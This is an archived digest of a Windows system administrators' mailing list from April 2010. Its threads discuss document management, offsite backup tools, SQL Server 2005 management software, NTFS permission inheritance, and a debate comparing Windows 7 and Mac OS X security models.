+1 - I'm looking for this kind of information as well.

We're looking to leverage the fax server built into our Electronic Medical 
Record system to handle administrative/non-clinical information in order to 
minimize the receipt of paper faxing altogether, if possible. This would 
require a third party application to grab the documents from the fax server. 
Taking it a step further, I could see the possible assigning of fax numbers to 
individuals, but we've got to have a workable solution in place first. I'm sure 
whatever we decide on would be able to do much more than that, but that would 
be our entry point.

Jonathan L. Raper, A+, MCSA, MCSE
Technology Coordinator
Eagle Physicians & Associates, PA
jra...@eaglemds.com
www.eaglemds.com


-Original Message-
From: Roger Wright [mailto:rhw...@gmail.com]
Sent: Wednesday, April 28, 2010 2:11 PM
To: NT System Admin Issues
Subject: Document Management Systems

My company is beginning to look at some type of document management
system for ease of access, DR, and litigation compliance.  One thing
we've determined is that we need to decide on a retention policy
before going much further.  Other than that, we don't know whether an
in-house or hosted solution would be best, or if it's even a
cost-effective option to pursue.

Any one care to share how you've made the transition from paper to
electronic document management?
Perhaps some lessons learned or "solutions" to avoid?

TIA...


Die dulci fruere!

Roger Wright
___

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Any medical information contained in this electronic message is CONFIDENTIAL 
and privileged. It is unlawful for unauthorized persons to view, copy, 
disclose, or disseminate CONFIDENTIAL information. This electronic message may 
contain information that is confidential and/or legally privileged. It is 
intended only for the use of the individual(s) and/or entity named as 
recipients in the message. If you are not an intended recipient of this 
message, please notify the sender immediately and delete this material from 
your computer. Do not deliver, distribute or copy this message, and do not 
disclose its contents or take any action in reliance on the information that it 
contains.

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: WTF? Fake AV - resolved.

[Brian Richards]

I was under the impression that Defender is not AV so much as anti-spyware? And 
that Vipre (originally called antivirus + antispyware) offers to take over the 
antispyware functions from Defender?





From: Angus Scott-Fleming 
To: NT System Admin Issues 
Sent: Wed, April 28, 2010 12:32:22 PM
Subject: Re: WTF? Fake AV - resolved.

On 28 Apr 2010 at 8:16, Brian Richards  wrote:

>    Hmmm, at home I've been telling Vipre to turn off Windows 
>    Defender - maybe time to re-think that strategy?

I don't think you want to run two AV packages simultaneously -- that's just 
asking for trouble. 

I'd like to see a command-line deep-scanner from a second AV vendor that you 
could run nightly as a "Scheduled Task" while running a different AV as your 
"Active Protection" or "Real-Time Protection".  McAfee used to offer a CL 
scanner, not sure if they still do.  ClamAV does.  Might have to look into that 
as an idea

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: backup software solution for offsite

[Charlie Kaiser]

OK. So how do you access it now? VPN? Direct RDP? Local only? Sounds like
you need two separate configs; one is the VPN/IPSEC connectivity, and the
other is the backup application.

Create the tunnel to the NAS device using your connectivity method of
choice.

Then run the backup locally and do either a copy job (like backup exec
provides) or manually script a copy up to the NAS. The big hurdle you're
going to run into is trying to copy large files across that link quickly and
reliably. 

Image files present a big challenge since even small changes result in new
image files that must be uploaded separately.

There are 3rd party tools that can accommodate this, but I don't have a
specific recommendation. I haven't found one that I like.

Another thing to watch for will be data transfer windows. Depending on the
size of the upload and the link speed, you could easily run into an
overlap...

I've had clients want something like this and we have always either moved
media physically using a manual offsite service like Iron Mountain or
Datasafe or used Amazon or Mozy. We ran into too many hurdles with bandwidth
utilization and time windows.

Perhaps someone else has a better solution based on their experience...

***
Charlie Kaiser
charl...@golden-eagle.org
Kingman, AZ
***  

> -Original Message-
> From: justino garcia [mailto:jgarciaitl...@gmail.com] 
> Sent: Wednesday, April 28, 2010 10:34 AM
> To: NT System Admin Issues
> Subject: Re: backup software solution for offsite
> 
> I host a server, in a rack, at some one else data-center ( I 
> rent a rack).
> 
> In the rack,i have a Network Attached storage devices, and 
> some other servers. Clients would like for it to go their, 
> and so would I.
> 
> 
> On Wed, Apr 28, 2010 at 1:30 PM, Charlie Kaiser 
>  wrote:
> 
> 
>   Are you saying your OWN datacenter? Or a hosted server 
> in someone else's
>   datacenter?
>   
> 
>   ***
>   Charlie Kaiser
>   charl...@golden-eagle.org
>   Kingman, AZ
>   ***
>   
>   > -Original Message-
>   > From: justino garcia [mailto:jgarciaitl...@gmail.com]
>   
>   > Sent: Wednesday, April 28, 2010 10:19 AM
>   > To: NT System Admin Issues
>   
>   > Subject: Re: backup software solution for offsite
>   >
>   > I wish to not hosted on a third party cloud, rather just host
>   > on our own server at the data center.
>   > and Mozy good, but we want a image snapshot.
>   >
>   > Thanks
>   >
>   >
>   > On Wed, Apr 28, 2010 at 1:15 PM, Charlie Kaiser
>   >  wrote:
>   >
>   >
>   >   Check out Mozy Pro (Mozy.com) or Amazon Web Services.
>   >
>   >   ***
>   >   Charlie Kaiser
>   >   charl...@golden-eagle.org
>   >   Kingman, AZ
>   >   ***
>   >
>   >
>   >   > -Original Message-
>   >   > From: justino garcia [mailto:jgarciaitl...@gmail.com]
>   >   > Sent: Wednesday, April 28, 2010 10:08 AM
>   >   > To: NT System Admin Issues
>   >   > Subject: backup software solution for offsite
>   >   >
>   >   > I have a need to setup offsite backsup via a 
> ipsec tunnel,
>   >   > thru sftp ftp or smb .
>   >   > Something we can take daily inc snapshots and 
> send over the
>   >   > internet using vpn, that has retation rules 
> and alerts to
>   >   > admin (me) if a backup fails.
>   >   > Any comercial prosuct any ideas?
>   >   >
>   >   > Thanks
>   >   >
>   >   >
>   >   > --
>   >   > Justin
>   >   > IT-TECH
>   >   >
>   >   > ~ Finally, powerful endpoint security that 
> ISN'T a resource
>   >   > hog! ~ ~
>   >   > 
>   ~
>   >
>   >
>   >   ~ Finally, powerful endpoint security that ISN'T a
>   > resource hog! ~
>   >   ~ 
>   ~
>   >
>   >
>   >
>   >
>   >
>   > --
>   > Justin
>   > IT-TECH
>   >
>   >
>   >
>   >
>   >
>   >
>   >
>   
>   
>   ~ Finally, powerful endpoint security that ISN'T a 
> resource hog! ~
>   ~   ~
>   
> 
> 
> 
> 
> --
> Justin
> IT-TECH
> 
> 
>  
> 
>  
> 
> 


~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: HP OEM OS Script Files

[Tres Coker]

I got rid of most of this, but after I sealed the image and reloaded it
immediately started running about 6 or 7 batch scripts, a Wake-On Lan
script, an Event Viewer script, security policy script...etc... I can't
figure out where these scripts are coming from.

On Wed, Apr 28, 2010 at 10:26 AM, Ben Scott  wrote:

> On Wed, Apr 28, 2010 at 9:51 AM, Tres Coker  wrote:
> > I am creating an image of an HP dc7900 that I plan to deploy. This PC was
> > created using the HP OEM copy of windows.
>
>   Every HP OEM disc set I've ever seen is loaded with tons of crap,
> quite a bit of which cannot be removed, some of which does not even
> identify itself in "Add/Remove Programs", etc.
>
>  Use a vanilla Microsoft disc.
>
> -- Ben
>
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~
> ~   ~
>

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: WTF? Fake AV

[Carl Houseman]

System folders and files are protected with NTFS permissions that are
read-only to non-admins.

Likewise the default permissions on the HKLM registry prevents users from
trashing it.

Carl

-Original Message-
From: greg.swe...@actsconsulting.net [mailto:greg.swe...@actsconsulting.net]

Sent: Wednesday, April 28, 2010 1:33 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Let me restart.  I agree that the MAC OS is not more secure because it
has a less infection rate.  Horrible way to justify security.  It's a
better security model because by default all users are non admins, and
the installation of anything requires the root password to install.
This limits exploits the to the user rights and does not completely
trash the box.  This does not account for buffer overflows, memory
exploits etc..but even those most tech releases show its still limited
to user context not root..

I wanted to see a document that showed how Windows 7 helps limit
exploits to the user context, and even if a user was higher privledge
what does Win7 do to protect the kernel and main system files?


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com] 
Sent: Wednesday, April 28, 2010 1:22 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Let's not out words in my mouth, OK? I'm not arguing that the Win7
security model is "so much better than the OS/X security model."

My stance is that the conclusion that was stated: The Mac OS is superior
to Win 7 from   security model perspective based on virus infection
numbers is flawed.

I've said before, and I'll say again: If you want to argue that the
choices made for defaults in that model were not clamped down quickly
enough in the name of compatibility, I might even be inclined to agree
with you. 

But the mechanisms are there, and as of the last few years, much more
sensible in terms of defaults, IMO.

-sc

> -Original Message-
> From: John Aldrich [mailto:jaldr...@blueridgecarpet.com]
> Sent: Wednesday, April 28, 2010 1:05 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
> 
> Ok, Steven. As you say, the OP was comparing Win 7 with OS/X. Tell me
why
> you think the *current* Windows security model is so much better than
the
> OS/X security model? It would seem to me that the Linux\Unix\OS/x
security
> model would be stronger than Windows, as at least in Linux, if you try
to
> install something as a user it simply fails stating you don't have
permission,
> but in Windows, UAC actually *prompts* you to escalate privileges. At
least
> that's the way I see things (from a limited experience with Win Vista
and Win
> 7.)
> 
> 
> 
> 
> -Original Message-
> From: Steven M. Caesare [mailto:scaes...@caesare.com]
> Sent: Wednesday, April 28, 2010 12:54 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
> 
> A) hardware driver models are a somewhat different beast, and that's
held
> true for many a platform, and isn't really germane to what we are
discussing
> here.
> 
> B) MS provided that info to HW devs FAR in advance.
> 
> 
> The point is, carrying forward a user base in the 100's of millions
and an app
> base in the 10's of thousands requires some significant transitioning.
Now
> you can argue their timeing all you want, but the OP's comment had two
> basic tennents that bear on this:
> 
> 1) He was comparing current day OS's (i.e. Win7 vs "the Mac")
> 
> 2) He was discussing the OS, not the apps written for them
> 
> Using AV infection #'s to compare those things and draw the conclusion
he
> did is no accurate, IMO.
> 
> -sc
> 
> > -Original Message-
> > From: Ben Scott [mailto:mailvor...@gmail.com]
> > Sent: Wednesday, April 28, 2010 12:47 PM
> > To: NT System Admin Issues
> > Subject: Re: WTF? Fake AV
> >
> > On Wed, Apr 28, 2010 at 11:56 AM, Steven M. Caesare
> >  wrote:
> > >> " But when Microsoft wants to, say, create a new API for
something,
> > >> they just do, and abandon the old one, and everyone else has to
> play
> > catchup"
> > >
> > > I guess I haven't seen those multitude of Technet articles ...
> >
> >   Yah, tell that to anyone who had hardware that lacks Vista
drivers.
> > Or has stuff written around Office 97-2003.  The fact that sometimes
> > Microsoft plays nice doesn't mean they always do.
> >
> > -- Ben


~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Document Management Systems

[Roger Wright]

My company is beginning to look at some type of document management
system for ease of access, DR, and litigation compliance.  One thing
we've determined is that we need to decide on a retention policy
before going much further.  Other than that, we don't know whether an
in-house or hosted solution would be best, or if it's even a
cost-effective option to pursue.

Any one care to share how you've made the transition from paper to
electronic document management?
Perhaps some lessons learned or "solutions" to avoid?

TIA...


Die dulci fruere!

Roger Wright
___

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: backup software solution for offsite

[Jay Dale]

Look at DoubleTake:

www.doubletake.com

Pricey, but pretty dependable.

Jay Dale
I.T. Manager, 3GiG
Mobile: 713.299.2541
Email: jay.d...@3-gig.com

Confidentiality Notice: This e-mail, including any attached files, may contain 
confidential and/or privileged information for the sole use of the intended 
recipient. If you are not the intended recipient, you are hereby notified that 
any review, dissemination or copying of this e-mail and attachments, if any, or 
the information contained herein, is strictly prohibited. If you are not the 
intended recipient (or authorized to receive information for the intended 
recipient), please contact the sender by reply e-mail and delete all copies of 
this message.


From: justino garcia [mailto:jgarciaitl...@gmail.com]
Sent: Wednesday, April 28, 2010 12:19 PM
To: NT System Admin Issues
Subject: Re: backup software solution for offsite

I wish to not hosted on a third party cloud, rather just host on our own server 
at the data center.
and Mozy good, but we want a image snapshot.

Thanks
On Wed, Apr 28, 2010 at 1:15 PM, Charlie Kaiser 
mailto:charl...@golden-eagle.org>> wrote:
Check out Mozy Pro (Mozy.com) or Amazon Web Services.

***
Charlie Kaiser
charl...@golden-eagle.org
Kingman, AZ
***

> -Original Message-
> From: justino garcia 
> [mailto:jgarciaitl...@gmail.com]
> Sent: Wednesday, April 28, 2010 10:08 AM
> To: NT System Admin Issues
> Subject: backup software solution for offsite
>
> I have a need to setup offsite backsup via a ipsec tunnel,
> thru sftp ftp or smb .
> Something we can take daily inc snapshots and send over the
> internet using vpn, that has retation rules and alerts to
> admin (me) if a backup fails.
> Any comercial prosuct any ideas?
>
> Thanks
>
>
> --
> Justin
> IT-TECH
>
> ~ Finally, powerful endpoint security that ISN'T a resource
> hog! ~ ~
>   ~


~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~



--
Justin
IT-TECH





~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Anyone Used Zmanda backup?

[justino garcia]

Anyone using Zmanda in production, how good is it?

Have you tested a recovery, how does it handle retention policies? And would
you recommended for off-site backups:?

thanks

-- 
Justin
IT-TECH

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: SQL Server 2005 management suite

[RichardMcClary]

Thanks!  I didn't notice that last part..

"SSMSE can also manage instances of the SQL Server Database Engine created 
by any edition of SQL Server 2005."
--
RMc

Jay Dale  wrote on 04/28/2010 12:31:04 PM:

> Is this what you need?
> 
> http://www.microsoft.com/downloads/details.aspx?
> displaylang=en&FamilyID=c243a5ae-4bd1-4e3d-94b8-5a0f62bf7796
> 
> 
> Jay Dale
> I.T. Manager, 3GiG
> Mobile: 713.299.2541
> Email: jay.d...@3-gig.com 
> 
> Confidentiality Notice: This e-mail, including any attached files, 
> may contain confidential and/or privileged information for the sole 
> use of the intended recipient. If you are not the intended 
> recipient, you are hereby notified that any review, dissemination or
> copying of this e-mail and attachments, if any, or the information 
> contained herein, is strictly prohibited. If you are not the 
> intended recipient (or authorized to receive information for the 
> intended recipient), please contact the sender by reply e-mail and 
> delete all copies of this message.
> 
> 
> From: richardmccl...@aspca.org [mailto:richardmccl...@aspca.org] 
> Sent: Wednesday, April 28, 2010 11:40 AM
> To: NT System Admin Issues
> Subject: SQL Server 2005 management suite
> 
> 
> Greetings! 
> 
> I have a server (Win 2003) with MS SQL Server 2005 (not "Express") 
> on it as a part of my VMWare management system.  I need to back up 
> this database.  It does _not_ have the "Management Suite" installed.
> I do not believe I have the license key for that installation, either. 
> 
> I happen to have a set of SQL Server disks (2 CD, 1 DVD, one "MS 
> Library" CD).  I also have the download for SQL Server 2005 Express 
> Management Suite. 
> 
> What is the least bad way to get MS management (again, just for DB 
> backup) onto this machine? 
> 
> I figure the "Express" version will not work with "Full" SQL Server, 
right? 
> 
> If I were to use one of the "Full" setup disks and run "Setup", 
> would I have the option of modifying (ie, adding Mangement Suite) to
> the current install and existing database?  Is this reasonably safe to 
do? 
> 
> I've obviously never before run SQL Server setup before - thanks!
> -- 
> Richard D. McClary 
> Systems Administrator, Information Technology Group 
> ASPCA® 
> 1717 S. Philo Rd, Ste 36 
> Urbana, IL  61802 
> 
> richardmccl...@aspca.org 
> 
> P: 217-337-9761 
> C: 217-417-1182 
> F: 217-337-9761 
> www.aspca.org 
> 
> The information contained in this e-mail, and any attachments 
> hereto, is from The American Society for the Prevention of Cruelty to 
Animals®
> (ASPCA®) and is intended only for use by the addressee(s) named 
> herein and may contain legally privileged and/or confidential 
> information. If you are not the intended recipient of this e-mail, 
> you are hereby notified that any dissemination, distribution, 
> copying or use of the contents of this e-mail, and any attachments 
> hereto, is strictly prohibited. If you have received this e-mail in 
> error, please immediately notify me by reply email and permanently 
> delete the original and any copy of this e-mail and any printout 
thereof. 
> 
> 
> 
> 
> 
~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: The finer points of NTFS ACLs (was: Software installs on new PCs)

[Mayo, Bill]

Wow, that's informative--thanks for that.  Microsoft had a seminar in
our city about 5 years ago, and I actually asked one of their support
folks about this.  He had no idea what I was talking about and said that
he had never heard of that before, so I figured I was out of luck.

That said, it is unfortunately not a solution for me, because of this:
"Make sure that the user account that is used to move the object has the
Change Permissions permission set. If the permission is not set, grant
the Change Permissions permission to the user account."  If I gave folks
the ability to change permissions on these secured directories, I would
have no end of problems.  Actually, I have the permissions set the way I
do to keep folks from monkeying around with that stuff in the first
place.

Bill Mayo 

-Original Message-
From: Crawford, Scott [mailto:crawfo...@evangel.edu] 
Sent: Wednesday, April 28, 2010 1:31 PM
To: NT System Admin Issues
Subject: RE: The finer points of NTFS ACLs (was: Software installs on
new PCs)

The values you want are

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Fo
rceCopyAclwithFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Mo
veSecurityAttributes

This KB details this:

http://support.microsoft.com/kb/310316


-Original Message-
From: Mayo, Bill [mailto:bem...@pittcountync.gov]
Sent: Wednesday, April 28, 2010 12:08 PM
To: NT System Admin Issues
Subject: RE: The finer points of NTFS ACLs (was: Software installs on
new PCs)

+infinity

We do exactly what you describe, and I always have issues (mostly when
doing file migrations due to server moves) related to people copying
files from one secured directory to another and the permissions not
getting updated.  When the permissions are set to inherit from parent,
it seems to me that Windows should re-assess that on a file copy.

Bill Mayo 

-Original Message-
From: Ben Scott [mailto:mailvor...@gmail.com]
Sent: Wednesday, April 28, 2010 12:45 PM
To: NT System Admin Issues
Subject: The finer points of NTFS ACLs (was: Software installs on new
PCs)

On Wed, Apr 28, 2010 at 11:54 AM, James Rankin 
wrote:
> We see this problem where people create folders under shared drives, 
> that each new folder is owned by the creating user who then has the
added rights.
> The solution is some weekly subinacl tasks that re-take ownership of 
> the whole fileserver structure back to BUILTIN\Administrators

  Wouldn't it be better to just remove "CREATOR OWNER" from the ACL on
the folder?

  All our shared folders are set so only the group(s) which should have
permission are present.

  The only good use for "CREATOR OWNER" I've found is kludging around
apps that insist on writing to their own program directory.  So grant
users "Create File" on "This folder only", and separately grant "CREATOR
OWNER" "Modify" on "Files only".  Now users can create the file, but
can't touch anything else.

  My biggest beef is that if you move an object within a "drive" on
Windows, Windows does not update the ACL on the object to reflect
different permissions in its new location.  So, for example, when a file
is moved from the QA-only pre-release folder to the whole-company
general-release folder, the file still has permissions for pre-release
and nobody else can read it.  Anyone got a fix for *that*?

-- Ben

~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
  ~

~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
  ~


~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
  ~




~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: WTF? Fake AV

[David Lum]

With Win7 you can't create a file in the root of C:, %systemroot%,  %PROGFILES% 
etc unless you're elevated.

Dave

-Original Message-
From: greg.swe...@actsconsulting.net [mailto:greg.swe...@actsconsulting.net] 
Sent: Wednesday, April 28, 2010 10:33 AM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Let me restart.  I agree that the MAC OS is not more secure because it
has a less infection rate.  Horrible way to justify security.  It's a
better security model because by default all users are non admins, and
the installation of anything requires the root password to install.
This limits exploits the to the user rights and does not completely
trash the box.  This does not account for buffer overflows, memory
exploits etc..but even those most tech releases show its still limited
to user context not root..

I wanted to see a document that showed how Windows 7 helps limit
exploits to the user context, and even if a user was higher privledge
what does Win7 do to protect the kernel and main system files?


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com] 
Sent: Wednesday, April 28, 2010 1:22 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Let's not out words in my mouth, OK? I'm not arguing that the Win7
security model is "so much better than the OS/X security model."

My stance is that the conclusion that was stated: The Mac OS is superior
to Win 7 from   security model perspective based on virus infection
numbers is flawed.

I've said before, and I'll say again: If you want to argue that the
choices made for defaults in that model were not clamped down quickly
enough in the name of compatibility, I might even be inclined to agree
with you. 

But the mechanisms are there, and as of the last few years, much more
sensible in terms of defaults, IMO.

-sc

> -Original Message-
> From: John Aldrich [mailto:jaldr...@blueridgecarpet.com]
> Sent: Wednesday, April 28, 2010 1:05 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
> 
> Ok, Steven. As you say, the OP was comparing Win 7 with OS/X. Tell me
why
> you think the *current* Windows security model is so much better than
the
> OS/X security model? It would seem to me that the Linux\Unix\OS/x
security
> model would be stronger than Windows, as at least in Linux, if you try
to
> install something as a user it simply fails stating you don't have
permission,
> but in Windows, UAC actually *prompts* you to escalate privileges. At
least
> that's the way I see things (from a limited experience with Win Vista
and Win
> 7.)
> 
> 
> 
> 
> -Original Message-
> From: Steven M. Caesare [mailto:scaes...@caesare.com]
> Sent: Wednesday, April 28, 2010 12:54 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
> 
> A) hardware driver models are a somewhat different beast, and that's
held
> true for many a platform, and isn't really germane to what we are
discussing
> here.
> 
> B) MS provided that info to HW devs FAR in advance.
> 
> 
> The point is, carrying forward a user base in the 100's of millions
and an app
> base in the 10's of thousands requires some significant transitioning.
Now
> you can argue their timeing all you want, but the OP's comment had two
> basic tennents that bear on this:
> 
> 1) He was comparing current day OS's (i.e. Win7 vs "the Mac")
> 
> 2) He was discussing the OS, not the apps written for them
> 
> Using AV infection #'s to compare those things and draw the conclusion
he
> did is no accurate, IMO.
> 
> -sc
> 
> > -Original Message-
> > From: Ben Scott [mailto:mailvor...@gmail.com]
> > Sent: Wednesday, April 28, 2010 12:47 PM
> > To: NT System Admin Issues
> > Subject: Re: WTF? Fake AV
> >
> > On Wed, Apr 28, 2010 at 11:56 AM, Steven M. Caesare
> >  wrote:
> > >> " But when Microsoft wants to, say, create a new API for
something,
> > >> they just do, and abandon the old one, and everyone else has to
> play
> > catchup"
> > >
> > > I guess I haven't seen those multitude of Technet articles ...
> >
> >   Yah, tell that to anyone who had hardware that lacks Vista
drivers.
> > Or has stuff written around Office 97-2003.  The fact that sometimes
> > Microsoft plays nice doesn't mean they always do.
> >
> > -- Ben
> >
> > ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
> >   ~
> 
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
>   ~
> 
> 
> 
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
>   ~

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~


~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~




~ Finally, powerful endpoint security that ISN'T a resource h

Re: backup software solution for offsite

[justino garcia]

I host a server, in a rack, at some one else data-center ( I rent a rack).

In the rack,i have a Network Attached storage devices, and some other
servers. Clients would like for it to go their, and so would I.

On Wed, Apr 28, 2010 at 1:30 PM, Charlie Kaiser
wrote:

> Are you saying your OWN datacenter? Or a hosted server in someone else's
> datacenter?
>
> ***
> Charlie Kaiser
> charl...@golden-eagle.org
> Kingman, AZ
> ***
>
> > -Original Message-
> > From: justino garcia [mailto:jgarciaitl...@gmail.com]
> > Sent: Wednesday, April 28, 2010 10:19 AM
> > To: NT System Admin Issues
> > Subject: Re: backup software solution for offsite
> >
> > I wish to not hosted on a third party cloud, rather just host
> > on our own server at the data center.
> > and Mozy good, but we want a image snapshot.
> >
> > Thanks
> >
> >
> > On Wed, Apr 28, 2010 at 1:15 PM, Charlie Kaiser
> >  wrote:
> >
> >
> >   Check out Mozy Pro (Mozy.com) or Amazon Web Services.
> >
> >   ***
> >   Charlie Kaiser
> >   charl...@golden-eagle.org
> >   Kingman, AZ
> >   ***
> >
> >
> >   > -Original Message-
> >   > From: justino garcia [mailto:jgarciaitl...@gmail.com]
> >   > Sent: Wednesday, April 28, 2010 10:08 AM
> >   > To: NT System Admin Issues
> >   > Subject: backup software solution for offsite
> >   >
> >   > I have a need to setup offsite backsup via a ipsec tunnel,
> >   > thru sftp ftp or smb .
> >   > Something we can take daily inc snapshots and send over the
> >   > internet using vpn, that has retation rules and alerts to
> >   > admin (me) if a backup fails.
> >   > Any comercial prosuct any ideas?
> >   >
> >   > Thanks
> >   >
> >   >
> >   > --
> >   > Justin
> >   > IT-TECH
> >   >
> >   > ~ Finally, powerful endpoint security that ISN'T a resource
> >   > hog! ~ ~
> >   >   ~
> >
> >
> >   ~ Finally, powerful endpoint security that ISN'T a
> > resource hog! ~
> >   ~   ~
> >
> >
> >
> >
> >
> > --
> > Justin
> > IT-TECH
> >
> >
> >
> >
> >
> >
> >
>
>
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~
> ~   ~
>



-- 
Justin
IT-TECH

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: WTF? Fake AV

[greg.sweers]

Let me restart.  I agree that the MAC OS is not more secure because it
has a less infection rate.  Horrible way to justify security.  It's a
better security model because by default all users are non admins, and
the installation of anything requires the root password to install.
This limits exploits the to the user rights and does not completely
trash the box.  This does not account for buffer overflows, memory
exploits etc..but even those most tech releases show its still limited
to user context not root..

I wanted to see a document that showed how Windows 7 helps limit
exploits to the user context, and even if a user was higher privledge
what does Win7 do to protect the kernel and main system files?


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com] 
Sent: Wednesday, April 28, 2010 1:22 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Let's not out words in my mouth, OK? I'm not arguing that the Win7
security model is "so much better than the OS/X security model."

My stance is that the conclusion that was stated: The Mac OS is superior
to Win 7 from   security model perspective based on virus infection
numbers is flawed.

I've said before, and I'll say again: If you want to argue that the
choices made for defaults in that model were not clamped down quickly
enough in the name of compatibility, I might even be inclined to agree
with you. 

But the mechanisms are there, and as of the last few years, much more
sensible in terms of defaults, IMO.

-sc

> -Original Message-
> From: John Aldrich [mailto:jaldr...@blueridgecarpet.com]
> Sent: Wednesday, April 28, 2010 1:05 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
> 
> Ok, Steven. As you say, the OP was comparing Win 7 with OS/X. Tell me
why
> you think the *current* Windows security model is so much better than
the
> OS/X security model? It would seem to me that the Linux\Unix\OS/x
security
> model would be stronger than Windows, as at least in Linux, if you try
to
> install something as a user it simply fails stating you don't have
permission,
> but in Windows, UAC actually *prompts* you to escalate privileges. At
least
> that's the way I see things (from a limited experience with Win Vista
and Win
> 7.)
> 
> 
> 
> 
> -Original Message-
> From: Steven M. Caesare [mailto:scaes...@caesare.com]
> Sent: Wednesday, April 28, 2010 12:54 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
> 
> A) hardware driver models are a somewhat different beast, and that's
held
> true for many a platform, and isn't really germane to what we are
discussing
> here.
> 
> B) MS provided that info to HW devs FAR in advance.
> 
> 
> The point is, carrying forward a user base in the 100's of millions
and an app
> base in the 10's of thousands requires some significant transitioning.
Now
> you can argue their timeing all you want, but the OP's comment had two
> basic tennents that bear on this:
> 
> 1) He was comparing current day OS's (i.e. Win7 vs "the Mac")
> 
> 2) He was discussing the OS, not the apps written for them
> 
> Using AV infection #'s to compare those things and draw the conclusion
he
> did is no accurate, IMO.
> 
> -sc
> 
> > -Original Message-
> > From: Ben Scott [mailto:mailvor...@gmail.com]
> > Sent: Wednesday, April 28, 2010 12:47 PM
> > To: NT System Admin Issues
> > Subject: Re: WTF? Fake AV
> >
> > On Wed, Apr 28, 2010 at 11:56 AM, Steven M. Caesare
> >  wrote:
> > >> " But when Microsoft wants to, say, create a new API for
something,
> > >> they just do, and abandon the old one, and everyone else has to
> play
> > catchup"
> > >
> > > I guess I haven't seen those multitude of Technet articles ...
> >
> >   Yah, tell that to anyone who had hardware that lacks Vista
drivers.
> > Or has stuff written around Office 97-2003.  The fact that sometimes
> > Microsoft plays nice doesn't mean they always do.
> >
> > -- Ben
> >
> > ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
> >   ~
> 
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
>   ~
> 
> 
> 
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
>   ~

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~


~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: SQL Server 2005 management suite

[Jay Dale]

Is this what you need?

http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=c243a5ae-4bd1-4e3d-94b8-5a0f62bf7796


Jay Dale
I.T. Manager, 3GiG
Mobile: 713.299.2541
Email: jay.d...@3-gig.com

Confidentiality Notice: This e-mail, including any attached files, may contain 
confidential and/or privileged information for the sole use of the intended 
recipient. If you are not the intended recipient, you are hereby notified that 
any review, dissemination or copying of this e-mail and attachments, if any, or 
the information contained herein, is strictly prohibited. If you are not the 
intended recipient (or authorized to receive information for the intended 
recipient), please contact the sender by reply e-mail and delete all copies of 
this message.


From: richardmccl...@aspca.org [mailto:richardmccl...@aspca.org]
Sent: Wednesday, April 28, 2010 11:40 AM
To: NT System Admin Issues
Subject: SQL Server 2005 management suite


Greetings!

I have a server (Win 2003) with MS SQL Server 2005 (not "Express") on it as a 
part of my VMWare management system.  I need to back up this database.  It does 
_not_ have the "Management Suite" installed.  I do not believe I have the 
license key for that installation, either.

I happen to have a set of SQL Server disks (2 CD, 1 DVD, one "MS Library" CD).  
I also have the download for SQL Server 2005 Express Management Suite.

What is the least bad way to get MS management (again, just for DB backup) onto 
this machine?

I figure the "Express" version will not work with "Full" SQL Server, right?

If I were to use one of the "Full" setup disks and run "Setup", would I have 
the option of modifying (ie, adding Mangement Suite) to the current install and 
existing database?  Is this reasonably safe to do?

I've obviously never before run SQL Server setup before - thanks!
--
Richard D. McClary
Systems Administrator, Information Technology Group
ASPCA(r)
1717 S. Philo Rd, Ste 36
Urbana, IL  61802

richardmccl...@aspca.org

P: 217-337-9761
C: 217-417-1182
F: 217-337-9761
www.aspca.org


The information contained in this e-mail, and any attachments hereto, is from 
The American Society for the Prevention of Cruelty to Animals(r) (ASPCA(r)) and 
is intended only for use by the addressee(s) named herein and may contain 
legally privileged and/or confidential information. If you are not the intended 
recipient of this e-mail, you are hereby notified that any dissemination, 
